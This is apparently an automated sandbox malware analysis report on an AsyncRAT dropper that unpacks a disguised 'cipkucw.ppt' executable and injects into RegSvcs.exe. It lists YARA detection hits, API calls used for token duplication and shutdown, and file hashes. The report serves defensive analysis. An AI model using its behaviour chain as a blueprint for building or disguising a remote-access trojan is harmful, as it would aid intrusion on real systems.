          Source: 00000006.00000003.1873380040.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 00000006.00000003.1873380040.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000010.00000002.2048370610.0000000000762000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 00000010.00000002.2048370610.0000000000762000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000011.00000003.2139352487.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 00000011.00000003.2139352487.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000013.00000003.2219758241.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 00000013.00000003.2219758241.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000013.00000003.2218782677.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 00000013.00000003.2218782677.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000011.00000003.2138543622.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 00000011.00000003.2138543622.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000013.00000003.2219549632.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000011.00000003.2138854777.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000006.00000003.1874482943.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 00000006.00000003.1874482943.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 0000000F.00000003.2001114393.0000000001628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 0000000F.00000003.2001114393.0000000001628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000013.00000003.2219993576.0000000001854000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 00000013.00000003.2219993576.0000000001854000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: Process Memory Space: RegSvcs.exe PID: 2368, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_00279B5C: _wcslen,CreateFileW,CloseHandle,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00279B5C
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00751A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,6_2_00751A91
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0075F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,6_2_0075F122
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_0102F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,15_2_0102F122
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_0028355D0_2_0028355D
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_0028B76F0_2_0028B76F
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_0027BF3D0_2_0027BF3D
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_0028A0080_2_0028A008
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_0029C0D60_2_0029C0D6
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_0028A2220_2_0028A222
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_002852140_2_00285214
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_0028C27F0_2_0028C27F
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_002992D00_2_002992D0
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_002A43600_2_002A4360
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_002846CF0_2_002846CF
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_002A86D20_2_002A86D2
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_002A480E0_2_002A480E
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_002748AA0_2_002748AA
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_00275AFE0_2_00275AFE
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_0028ABC80_2_0028ABC8
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_0028BC050_2_0028BC05
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_00277CBA0_2_00277CBA
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_00284D320_2_00284D32
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_00273D9D0_2_00273D9D
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_0029BEA70_2_0029BEA7
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_00275F390_2_00275F39
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_00285F0B0_2_00285F0B
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_007180376_2_00718037
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_007120076_2_00712007
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0070E0BE6_2_0070E0BE
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_006FE1A06_2_006FE1A0
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_006F225D6_2_006F225D
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_007122C26_2_007122C2
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0072A28E6_2_0072A28E
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0070C59E6_2_0070C59E
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0077C7A36_2_0077C7A3
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0072E89F6_2_0072E89F
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0076291A6_2_0076291A
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00726AFB6_2_00726AFB
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00758B276_2_00758B27
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0071CE306_2_0071CE30
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_007271696_2_00727169
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_007851D26_2_007851D2
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_006F92406_2_006F9240
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_006F94996_2_006F9499
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_007117246_2_00711724
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00711A966_2_00711A96
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_006F9B606_2_006F9B60
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00717BAB6_2_00717BAB
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00711D406_2_00711D40
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00717DDA6_2_00717DDA
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 12_2_01B7415812_2_01B74158
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 12_2_01B74A2812_2_01B74A28
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 12_2_01B75FE812_2_01B75FE8
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 12_2_01B73E1012_2_01B73E10
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 12_2_07B41B1012_2_07B41B10
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FDE0BE15_2_00FDE0BE
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FE803715_2_00FE8037
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FE200715_2_00FE2007
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FCE1A015_2_00FCE1A0
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FE22C215_2_00FE22C2
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FFA28E15_2_00FFA28E
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FC225D15_2_00FC225D
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FDC59E15_2_00FDC59E
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_0104C7A315_2_0104C7A3
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_0103291A15_2_0103291A
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FFE89F15_2_00FFE89F
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FF6AFB15_2_00FF6AFB
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_01028B2715_2_01028B27
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FECE3015_2_00FECE30
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_010551D215_2_010551D2
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FF716915_2_00FF7169
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FC924015_2_00FC9240
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FC949915_2_00FC9499
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FE172415_2_00FE1724
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FE1A9615_2_00FE1A96
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FE7BAB15_2_00FE7BAB
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FC9B6015_2_00FC9B60
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FE7DDA15_2_00FE7DDA
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FE1D4015_2_00FE1D40
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: String function: 00FDFD60 appears 31 times
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: String function: 00FE0DC0 appears 46 times
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: String function: 00710DC0 appears 46 times
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: String function: 0070FD60 appears 31 times
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: String function: 002957A5 appears 34 times
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: String function: 00296630 appears 31 times
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: String function: 002957D8 appears 66 times
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs yjOJ1YK5M3.exe
          Source: yjOJ1YK5M3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          Source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
          Source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          Source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
          Source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 16.2.RegSvcs.exe.760000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          Source: 16.2.RegSvcs.exe.760000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
          Source: 16.2.RegSvcs.exe.760000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          Source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
          Source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          Source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
          Source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          Source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
          Source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          Source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
          Source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          Source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
          Source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          Source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
          Source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          Source: 00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          Source: 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 0000000F.00000003.2000519761.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          Source: 0000000F.00000003.2000519761.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 00000006.00000003.1874054223.000000000361A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          Source: 00000006.00000003.1874054223.000000000361A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 00000013.00000003.2219656121.0000000001845000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          Source: 00000013.00000003.2219656121.0000000001845000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
